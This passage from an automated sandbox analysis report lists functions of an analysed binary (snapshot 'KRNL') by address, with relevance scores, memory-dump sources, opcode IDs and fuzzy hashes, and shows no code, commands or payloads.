                                                                                                                                                                                                                                                          • Opcode ID: cf1a1df2cccf502249e80f8767bee934b3f81d63e9dce52cdd7222a5ef567c20
                                                                                                                                                                                                                                                          • Instruction ID: 1d401ccbc5330020b48fc023e4a699b76f3f91e523f4b1a7854651c222232fa2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf1a1df2cccf502249e80f8767bee934b3f81d63e9dce52cdd7222a5ef567c20
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C031E076A083128BC7109F5AD85266BB3F2EFC6350F05882DE6D19B361EB38DC10C75A
                                                                                                                                                                                                                                                          Function 00440400 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: yJA
                                                                                                                                                                                                                                                          • API String ID: 2994545307-2938920004
                                                                                                                                                                                                                                                          • Opcode ID: 84be69a13e54c4aed9f449a33fb6588dae3e98482a0fb2b9d7165eec0b47645c
                                                                                                                                                                                                                                                          • Instruction ID: 23d227faf8ce9b4e26db9de62984c8614510f8221fb2136dd27611cc46179942
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84be69a13e54c4aed9f449a33fb6588dae3e98482a0fb2b9d7165eec0b47645c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9218779B142005BE7148F14DC80ABFB3A6FBC5324F18853DEB80873A5DA399921C759
                                                                                                                                                                                                                                                          Function 0040C158 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: |X|X
                                                                                                                                                                                                                                                          • API String ID: 0-2218283020
                                                                                                                                                                                                                                                          • Opcode ID: 4e5c2659c129e1988177d5d496e4e7676c33d3dde831d9fe778a2e42bff78039
                                                                                                                                                                                                                                                          • Instruction ID: cac40e2581ff872ab27a598a1b45c8296db47ebe279b368b7e4a74499d8b646e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e5c2659c129e1988177d5d496e4e7676c33d3dde831d9fe778a2e42bff78039
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA1190BAE006229BC711CF68CC81BAAF3B1BF49700F025225E959FB360D671ED528794
                                                                                                                                                                                                                                                          Function 00407410 Relevance: .6, Instructions: 625COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
                                                                                                                                                                                                                                                          • Instruction ID: d874bbcf5e1159c85269ce196b50d6e2d62d6b3305aebcbcfe8904bc07c1c355
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8622A272A087118BC725DF18D9806ABB3E1BFC4319F19893ED9C6A7385D738B8518B47
                                                                                                                                                                                                                                                          Function 004386C0 Relevance: .5, Instructions: 513COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2d3c62a6e4de999ed87ef6fc42ba95c8b3b0a48b33c1ed109eb8fbf5ecc21169
                                                                                                                                                                                                                                                          • Instruction ID: ed87f8f56d2034feecb16addb3c1d7f4234c8264b3b86d2c62e2f9d85163fe5b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d3c62a6e4de999ed87ef6fc42ba95c8b3b0a48b33c1ed109eb8fbf5ecc21169
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEE12572A083158BE714DE25C98076BF3D2BFC8304F15A53DF98867391DB79AC06879A
                                                                                                                                                                                                                                                          Function 0041B729 Relevance: .5, Instructions: 502COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 81df7370a673775438192dc4c9e14377fa855e1243d58cad9bd2d063f4e90178
                                                                                                                                                                                                                                                          • Instruction ID: f5ba16966c3e101888b7bca72879cdb3ad45e943e1706bf8361143ff5552ba76
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81df7370a673775438192dc4c9e14377fa855e1243d58cad9bd2d063f4e90178
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38E1F474600601CBC729CF29C4916B3B7F2FF9A310719855ED4968F7A6E738E881CB99
                                                                                                                                                                                                                                                          Function 00425A90 Relevance: .4, Instructions: 414COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 37ca8b8b3c6ed410c19b2c03abc9ee81bf72cecb125f83273075474e56802f73
                                                                                                                                                                                                                                                          • Instruction ID: 88bd832e139d41634c66c7e56a057755965ae3d8a41c3c510fb752d64a63a0a8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37ca8b8b3c6ed410c19b2c03abc9ee81bf72cecb125f83273075474e56802f73
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CE111B5608314DFD720DF64E891B6BB7E1FBA6308F81893EF5858B2A0D7749805CB46
                                                                                                                                                                                                                                                          Function 00422140 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5136a095a2ea78d221fcadaa032206e0a687433376e0ab07b55045eaa6b7e3bc
                                                                                                                                                                                                                                                          • Instruction ID: 3a6bf685c77663f863f8a5aa86c54eb2a31b14798c22e02175e5ecf7feff1080
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5136a095a2ea78d221fcadaa032206e0a687433376e0ab07b55045eaa6b7e3bc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42A12371A04321ABD710DF24E95276BB3A0FF94314F85452AED859B391E3BCED41C39A
                                                                                                                                                                                                                                                          Function 0043F780 Relevance: .3, Instructions: 346COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: f3263b6494e4807a421ff46442ba8fa50b4497d4b6464c460086b30a21c1aa25
                                                                                                                                                                                                                                                          • Instruction ID: 9ebdb03625680536fcb291a839db870c85765b0a47897c3b7d115d578eec363d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3263b6494e4807a421ff46442ba8fa50b4497d4b6464c460086b30a21c1aa25
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8A1E275A083219BCB28DF18C89066BB3E2BF88310F15953DE9D99B3A1E775EC05C785
                                                                                                                                                                                                                                                          Function 0043F450 Relevance: .3, Instructions: 306COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: ac21b3154371b9123b6cf7eb29276aeded3cff8d4f0c9c4ebdc798624198afa3
                                                                                                                                                                                                                                                          • Instruction ID: eb6c137914190778cc39401c3b1ae89dfde7721dc61adad6eda297e009315b74
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac21b3154371b9123b6cf7eb29276aeded3cff8d4f0c9c4ebdc798624198afa3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F891D2396083119BC728DF18C99192BB3E2FF98710F15953DE9858B361EB35EC16CB85
                                                                                                                                                                                                                                                          Function 0042BD77 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 73c5540b047db511690bcec2d5be8477da0bf30420e7a3d2e4d17ab541a095ee
                                                                                                                                                                                                                                                          • Instruction ID: fdfd5630cbfef5ef22e4fdbb6b9e2235d5d7d2952f6c86c7509a691c573987a7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73c5540b047db511690bcec2d5be8477da0bf30420e7a3d2e4d17ab541a095ee
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0715A72A083618BD3188F25986133BBBD1DFD2704F69886EE4D69B391D7798805CB46
                                                                                                                                                                                                                                                          Function 0042BE3B Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7beb77718832f912f93dec333d0382bf07e2159cb3fb380175e515cb799c5fa6
                                                                                                                                                                                                                                                          • Instruction ID: 30c9fa131dfd827492eb9a81449ae176163bcae57c035aca38747d46e10efa6b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7beb77718832f912f93dec333d0382bf07e2159cb3fb380175e515cb799c5fa6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C714871A083A18BD3188F35986133BBBD1DFD2704F69886EE4D69B391D7798805CB86
                                                                                                                                                                                                                                                          Function 0042BE9D Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: fbc837b4b3cb6af37b41f583372a8404740e5a4fdc6351e5068ac917573e76a8
                                                                                                                                                                                                                                                          • Instruction ID: a61e00984761ba80395561639032770b7f585e41462ff11f5500d416fb78d726
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbc837b4b3cb6af37b41f583372a8404740e5a4fdc6351e5068ac917573e76a8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32616C726083618BD3188F35D86137BBBD1DFD2704F68886DE4D19B391D67D8805CB46
                                                                                                                                                                                                                                                          Function 0041C119 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6b3a3048a4542faa0e292eaec23e2d8fcf88195d61b68d57c05e6f9fa7b3e697
                                                                                                                                                                                                                                                          • Instruction ID: 7a7230bd175fe8df77bf71d9a9d70d43fbaba0e463c2f5fb034005e811d22f28
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b3a3048a4542faa0e292eaec23e2d8fcf88195d61b68d57c05e6f9fa7b3e697
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC819FB0910B009FC324EF39C946123BBF1FF56300B548A6EE8D64B795E335A495CB96
                                                                                                                                                                                                                                                          Function 0042BE86 Relevance: .2, Instructions: 248COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7e91b1f93db6604f0e1f47c5d94589793502ad60c2ebaf338f96a8d2dc823a3a
                                                                                                                                                                                                                                                          • Instruction ID: c958039b7f324a70f14877e38d7e87bb170a8ceb339f658c132a5929e586524f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e91b1f93db6604f0e1f47c5d94589793502ad60c2ebaf338f96a8d2dc823a3a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9514872A183A18BD3188F25D8A137BBBD19FD2704F68886DE4D19B391D2798805CF56
                                                                                                                                                                                                                                                          Function 0041C3F4 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0ebcfdce4285e189d9b6b4f3cb4784d52b0f09d6a1c2b672a180d182182b0bd1
                                                                                                                                                                                                                                                          • Instruction ID: 09ac1d0a9713e752f4627eff734c4282fb3d1a19a84e1ba2698046d2faa5f02a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ebcfdce4285e189d9b6b4f3cb4784d52b0f09d6a1c2b672a180d182182b0bd1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3051F6B05147219BD724CF29C841263B7F3FFA5300754861DD4968B764E73AF492CB99
                                                                                                                                                                                                                                                          Function 00440650 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: b1b17e811ad84c02a75428410a430e784aaf74558106e518f534b17a2e8755fd
                                                                                                                                                                                                                                                          • Instruction ID: 99dc13c7fbb656e8e593b4c013347aff3b0bffb19504d9c0fb3df3c2b29b5b1a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1b17e811ad84c02a75428410a430e784aaf74558106e518f534b17a2e8755fd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 264133782583009BE7148F14DD81B7BB3A6EBC4314F28453EE285973A0DA79BC218B0A
                                                                                                                                                                                                                                                          Function 00424CCD Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5c06d3715020c9e906dd8f3ea95b00d607807413e7af719e77faa20cdb60b4cb
                                                                                                                                                                                                                                                          • Instruction ID: ea4754be5dd7e8cf826f622dde6b3e998fbc03a804596390a98b67661fe1b0f4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c06d3715020c9e906dd8f3ea95b00d607807413e7af719e77faa20cdb60b4cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64412579E10221DBDB18CF28E9016AAB3F2FF8A300F159579C845E3755DB385914CB84
                                                                                                                                                                                                                                                          Function 0043B450 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: cff4c8bf935c6f11034f3282e146f2a6c370e0ca8f0a63124d1a240452eb4176
                                                                                                                                                                                                                                                          • Instruction ID: 20d5841960d25e88823685a0e503dee0d7ec10e54da16e755c7071827351d428
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cff4c8bf935c6f11034f3282e146f2a6c370e0ca8f0a63124d1a240452eb4176
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20312272A09210AFD710CF19C94476BB3E5EFD8708F05982DE988AB310D3769D06CBCA
                                                                                                                                                                                                                                                          Function 0043DC5E Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 807bec0362dbcb8b1f2841beb8f7528c0114618da1fc548bdf9fe4127f2aab19
                                                                                                                                                                                                                                                          • Instruction ID: 5a3520f55d16dba99afe4212a530fbd96f219d62ced46578b1605fced0d3a66b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 807bec0362dbcb8b1f2841beb8f7528c0114618da1fc548bdf9fe4127f2aab19
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97310572F506258BDB1CCFADCC523FFB6A2AB89304F18512ED946E7790CA7859018794
                                                                                                                                                                                                                                                          Function 0041BD8F Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7d25e4151b20e1252b310cbf19ae9d376f513415a955b05fc74d62dd8d03d4cb
                                                                                                                                                                                                                                                          • Instruction ID: 4b10f2fb83d240a8194653326424cd87360353ae92ccfbb6a9d51511832f3619
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d25e4151b20e1252b310cbf19ae9d376f513415a955b05fc74d62dd8d03d4cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E312635611700CFD7258F35C890652B7A3FF8A318B28D1AEC5968BBA6D73AE403C709
                                                                                                                                                                                                                                                          Function 00429A43 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
